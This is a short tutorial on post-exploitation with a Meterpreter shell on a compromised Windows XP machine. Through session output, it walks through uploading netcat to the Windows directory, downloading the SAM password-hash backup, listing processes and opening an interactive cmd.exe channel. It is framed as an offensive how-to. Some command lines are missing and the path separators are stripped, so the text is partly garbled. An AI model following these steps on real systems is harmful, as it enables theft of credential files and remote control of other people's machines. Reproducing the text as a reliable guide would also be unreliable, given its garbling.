There are various ways of deploying the meterpreter payload. This short article deals with deploying meterpreter as an exploit payload. This article is not about exploiting the machine! I assume here that you have already done that. Assuming I have gained a meterpreter shell on my exploited machine I want to upload netcat to the ‘windows’ directory, and download the ‘not so hidden’ SAM file backup in the windowsrepair directory.
[*] uploading : /home/tools/nc.exe -> c:windows
[*] uploaded : /home/tools/nc.exe -> c:windowsnc.exe
meterpreter >
meterpreter> download c:windowsrepairsam /tmp
[*] downloading: c:windowsrepairsam -> /tmp
[*] downloaded : c:windowsrepairsam -> /tmp/sam
Let’s take a look at the process list …
Process list
============
PID Name Path
— —- —-
404 smss.exe SystemRootSystem32smss.exe
476 csrss.exe ??C:WINDOWSsystem32csrss.exe
648 winlogon.exe ??C:WINDOWSsystem32winlogon.exe
. . .
There’s more – you might be looking for a particular process. For this example I just wanted to show the command, simple as it is.
Now I want a DOS prompt (cmd.exe) and want to interact with it.
Process 1055 created.
Channel 2 created.
meterpreter > interact 2
Interacting with channel 2…
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:Program Filesexit
exit
meterpreter >
… and there you have it.
